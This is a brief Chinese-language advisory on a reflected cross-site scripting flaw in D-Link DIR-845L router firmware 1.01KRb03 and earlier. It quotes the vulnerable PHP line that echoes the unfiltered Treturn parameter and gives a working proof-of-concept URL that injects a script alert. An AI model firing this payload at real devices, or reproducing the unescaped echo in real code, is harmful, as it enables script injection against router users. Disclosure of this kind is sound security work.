D-Link DIR-845L 路由器版本 1.01KRb03 及以下通过 /htdocs/webinc/js/bsc_sms_inbox.php 存在跨站脚本(XSS)漏洞。
/htdocs/webinc/js/bsc_sms_inbox.php该漏洞是由于参数 $_GET["Treturn"] 缺乏过滤,在 bsc_sms_inbox.php 第 17 行代码中直接使用所致。
漏洞代码片段:
var get_Treturn = '`<?if($_GET["Treturn"]=="") echo "0"; else echo $_GET["Treturn"];?>';
http://IP:8080/bsc_sms_inbox.php?Treturn=%27%3C/script%3E%3Cscript%3Ealert(1337)%3C/script%3E
